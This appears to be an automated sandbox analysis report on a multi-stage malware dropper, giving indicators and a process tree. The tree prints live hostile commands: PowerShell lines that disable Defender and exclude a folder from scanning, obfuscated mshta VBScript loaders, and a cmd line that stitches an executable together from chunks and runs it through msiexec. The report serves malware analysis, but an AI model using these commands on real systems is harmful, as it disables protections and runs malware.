a7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSun038db98f99bf9a.exepid process 3096 powershell.exe 3096 powershell.exe 3992 powershell.exe 3992 powershell.exe 3096 powershell.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
Explorer.EXERuntimeBroker.exeQUKHyXjH3qRKVkqx.exepid process 3232 Explorer.EXE 17280 RuntimeBroker.exe 20680 QUKHyXjH3qRKVkqx.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
dyEvj3hC2t7OMuwoWXdKUmK3.exenxfL7_6XSgUfDUVDEan06Mbe.exe024wC3SO_qVtbE4Y9Lz5RQz9.execontrol.exeE26D.exepid process 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5328 024wC3SO_qVtbE4Y9Lz5RQz9.exe 3940 control.exe 3940 control.exe 3940 control.exe 3940 control.exe 1440 E26D.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
msedge.exepid process 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exesvchost.exeSun03d477f1a31.exepowershell.exepowershell.exeSun03ea09aa5c9686e5.exeSun0328255c4bce6fb.exetaskkill.exeHj5Pq1vV39n8G1DTpop2wdl2.exedescription pid process Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1452 svchost.exe Token: SeCreatePagefilePrivilege 1452 svchost.exe Token: SeCreateTokenPrivilege 4064 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 4064 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 4064 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 4064 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 4064 Sun03d477f1a31.exe Token: SeTcbPrivilege 4064 Sun03d477f1a31.exe Token: SeSecurityPrivilege 4064 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 4064 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 4064 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 4064 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 4064 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 4064 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 4064 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 4064 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 4064 Sun03d477f1a31.exe Token: SeBackupPrivilege 4064 Sun03d477f1a31.exe Token: SeRestorePrivilege 4064 Sun03d477f1a31.exe Token: SeShutdownPrivilege 4064 Sun03d477f1a31.exe Token: SeDebugPrivilege 4064 Sun03d477f1a31.exe Token: SeAuditPrivilege 4064 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 4064 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 4064 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 4064 Sun03d477f1a31.exe Token: SeUndockPrivilege 4064 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 4064 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 4064 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 4064 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 4064 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 4064 Sun03d477f1a31.exe Token: 31 4064 Sun03d477f1a31.exe Token: 32 4064 Sun03d477f1a31.exe Token: 33 4064 Sun03d477f1a31.exe Token: 34 4064 Sun03d477f1a31.exe Token: 35 4064 Sun03d477f1a31.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 812 Sun03ea09aa5c9686e5.exe Token: SeDebugPrivilege 3652 Sun0328255c4bce6fb.exe Token: SeDebugPrivilege 5600 taskkill.exe Token: SeCreateTokenPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeAssignPrimaryTokenPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeLockMemoryPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeIncreaseQuotaPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeMachineAccountPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeTcbPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSecurityPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeTakeOwnershipPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeLoadDriverPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSystemProfilePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSystemtimePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeProfSingleProcessPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeIncBasePriorityPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeCreatePagefilePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeCreatePermanentPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeBackupPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeRestorePrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
colorcpl.exemsedge.exeinstaller.exeExplorer.EXECalculator.exeinstaller.exepid process 5312 colorcpl.exe 7160 msedge.exe 33668 installer.exe 3232 Explorer.EXE 32860 Calculator.exe 49056 installer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEpid process 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
cmd.execmd.execmd.execmd.exeRuntimeBroker.execmd.exepid process 29656 cmd.exe 31380 cmd.exe 8384 cmd.exe 9012 cmd.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 49772 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesvchost.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe setup_installer.exe PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe setup_installer.exe PID 812 wrote to memory of 2172 812 setup_x86_x64_install.exe setup_installer.exe PID 2172 wrote to memory of 5056 2172 setup_installer.exe setup_install.exe PID 2172 wrote to memory of 5056 2172 setup_installer.exe setup_install.exe PID 2172 wrote to memory of 5056 2172 setup_installer.exe setup_install.exe PID 1452 wrote to memory of 4880 1452 svchost.exe MoUsoCoreWorker.exe PID 1452 wrote to memory of 4880 1452 svchost.exe MoUsoCoreWorker.exe PID 5056 wrote to memory of 1592 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1592 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1592 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2912 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2912 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2912 5056 setup_install.exe cmd.exe PID 1592 wrote to memory of 3096 1592 cmd.exe powershell.exe PID 1592 wrote to memory of 3096 1592 cmd.exe powershell.exe PID 1592 wrote to memory of 3096 1592 cmd.exe powershell.exe PID 5056 wrote to memory of 3200 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3200 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3200 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3424 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3424 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3424 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3720 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3720 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3720 5056 setup_install.exe cmd.exe PID 2912 wrote to memory of 3992 2912 cmd.exe powershell.exe PID 2912 wrote to memory of 3992 2912 cmd.exe powershell.exe PID 2912 wrote to memory of 3992 2912 cmd.exe powershell.exe PID 5056 wrote to memory of 4120 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4120 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4120 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2992 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2992 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2992 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 924 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 924 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 924 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3904 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3904 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3904 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1908 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1908 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1908 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2916 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2916 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2916 5056 setup_install.exe cmd.exe PID 3200 wrote to memory of 4064 3200 cmd.exe Sun03d477f1a31.exe PID 3200 wrote to memory of 4064 3200 cmd.exe Sun03d477f1a31.exe PID 3200 wrote to memory of 4064 3200 cmd.exe Sun03d477f1a31.exe PID 5056 wrote to memory of 808 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 808 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 808 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1512 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1512 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1512 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4108 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4108 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4108 5056 setup_install.exe cmd.exe PID 3720 wrote to memory of 4088 3720 cmd.exe Sun039750b00c.exe PID 3720 wrote to memory of 4088 3720 cmd.exe Sun039750b00c.exe PID 3720 wrote to memory of 4088 3720 cmd.exe Sun039750b00c.exe PID 3424 wrote to memory of 3324 3424 cmd.exe Sun033e271e0ce96c08.exe PID 3424 wrote to memory of 3324 3424 cmd.exe Sun033e271e0ce96c08.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
46puvSQnm9v3JLD7WOWMRWFL.exe8CD8CA21.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8CD8CA21.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exeSun03d477f1a31.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 20407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 2407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exeSun039750b00c.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun039750b00c.exe") do taskkill -Im "%~Nxm" /F8⤵
-
C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exEWXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE") do taskkill -Im "%~Nxm" /F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CLOse(CReAteoBjECt ( "wScrIPT.SHeLL"). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0, TRUe ))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T& CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X+52TbWL.SZV +Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV& START msiexec.exe -Y .\UKHPfGIw.UMV11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y .\UKHPfGIw.UMV12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Sun039750b00c.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0324aba28588c0.exeSun0324aba28588c0.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 2407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038aa349e3318e.exeSun038aa349e3318e.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe"C:\Users\Admin\Pictures\Adobe Films\tv3K6hSK60TEWOTPIZxPD0z1.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe"C:\Users\Admin\Pictures\Adobe Films\hgmCgKLLp6_aBM_p6OXdxhM4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 1528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe"C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit9⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f10⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"7⤵
